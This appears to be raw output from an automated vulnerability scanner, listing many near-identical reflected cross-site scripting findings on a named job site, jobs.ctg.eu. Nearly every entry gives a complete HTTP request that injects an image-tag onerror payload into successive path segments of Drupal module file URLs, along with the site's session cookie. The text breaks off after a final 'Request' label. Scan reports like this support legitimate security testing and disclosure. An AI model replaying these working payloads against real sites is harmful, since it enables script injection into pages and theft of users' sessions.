GET /sites73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583/all/modules/logintoboggan/logintoboggan.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e was submitted in the REST URL parameter 2. This input was echoed as 544ad"><img src=a onerror=alert(1)>2a3d032736e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e/modules/logintoboggan/logintoboggan.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd was submitted in the REST URL parameter 3. This input was echoed as 790cb"><img src=a onerror=alert(1)>671c6b10ccd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd/logintoboggan/logintoboggan.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00 was submitted in the REST URL parameter 4. This input was echoed as 12225"><img src=a onerror=alert(1)>e7c4abc7d00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/logintoboggan12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00/logintoboggan.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be was submitted in the REST URL parameter 5. This input was echoed as 302e5"><img src=a onerror=alert(1)>7ed5455b6be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/logintoboggan/logintoboggan.css302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e was submitted in the REST URL parameter 1. This input was echoed as 9f3d1"><img src=a onerror=alert(1)>eea6370678e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e/all/modules/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453 was submitted in the REST URL parameter 2. This input was echoed as e296a"><img src=a onerror=alert(1)>55f421ac453 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453/modules/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe was submitted in the REST URL parameter 3. This input was echoed as d4f68"><img src=a onerror=alert(1)>5a9f31570fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesd4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe/views/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd was submitted in the REST URL parameter 4. This input was echoed as 38029"><img src=a onerror=alert(1)>d2997aa32cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd/css/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9 was submitted in the REST URL parameter 5. This input was echoed as a641b"><img src=a onerror=alert(1)>bebe5c861b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/cssa641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9/views.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595 was submitted in the REST URL parameter 6. This input was echoed as 217ce"><img src=a onerror=alert(1)>e2f23c29595 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/css/views.css217ce"><img%20src%3da%20onerror%3dalert(1)>e2f23c29595?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151 was submitted in the REST URL parameter 1. This input was echoed as 55ce2"><img src=a onerror=alert(1)>b6a4460d151 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites55ce2"><img%20src%3da%20onerror%3dalert(1)>b6a4460d151/all/modules/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f was submitted in the REST URL parameter 2. This input was echoed as b1472"><img src=a onerror=alert(1)>f600b8d8b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allb1472"><img%20src%3da%20onerror%3dalert(1)>f600b8d8b7f/modules/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6 was submitted in the REST URL parameter 3. This input was echoed as db72e"><img src=a onerror=alert(1)>21d9a5a41d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesdb72e"><img%20src%3da%20onerror%3dalert(1)>21d9a5a41d6/views/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466 was submitted in the REST URL parameter 4. This input was echoed as 40667"><img src=a onerror=alert(1)>7444b52466 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views40667"><img%20src%3da%20onerror%3dalert(1)>7444b52466/js/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c was submitted in the REST URL parameter 5. This input was echoed as 98959"><img src=a onerror=alert(1)>38f529bd14c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js98959"><img%20src%3da%20onerror%3dalert(1)>38f529bd14c/base.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a was submitted in the REST URL parameter 6. This input was echoed as 5d277"><img src=a onerror=alert(1)>086dd8d227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js/base.js5d277"><img%20src%3da%20onerror%3dalert(1)>086dd8d227a?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d was submitted in the REST URL parameter 1. This input was echoed as a17d3"><img src=a onerror=alert(1)>d553028ad8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesa17d3"><img%20src%3da%20onerror%3dalert(1)>d553028ad8d/all/modules/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1 was submitted in the REST URL parameter 2. This input was echoed as e3d6d"><img src=a onerror=alert(1)>f58295307b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle3d6d"><img%20src%3da%20onerror%3dalert(1)>f58295307b1/modules/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38 was submitted in the REST URL parameter 3. This input was echoed as ab624"><img src=a onerror=alert(1)>3f8d84be38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesab624"><img%20src%3da%20onerror%3dalert(1)>3f8d84be38/views/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530 was submitted in the REST URL parameter 4. This input was echoed as 42122"><img src=a onerror=alert(1)>5997e6b530 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views42122"><img%20src%3da%20onerror%3dalert(1)>5997e6b530/js/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283 was submitted in the REST URL parameter 5. This input was echoed as b518a"><img src=a onerror=alert(1)>ec316c3a283 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/jsb518a"><img%20src%3da%20onerror%3dalert(1)>ec316c3a283/dependent.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef was submitted in the REST URL parameter 6. This input was echoed as db2bb"><img src=a onerror=alert(1)>d9d6098e8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views/js/dependent.jsdb2bb"><img%20src%3da%20onerror%3dalert(1)>d9d6098e8ef?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f was submitted in the REST URL parameter 1. This input was echoed as 72838"><img src=a onerror=alert(1)>b3d0a8fde2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites72838"><img%20src%3da%20onerror%3dalert(1)>b3d0a8fde2f/all/modules/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36 was submitted in the REST URL parameter 2. This input was echoed as 1d572"><img src=a onerror=alert(1)>4fdbbcc7f36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
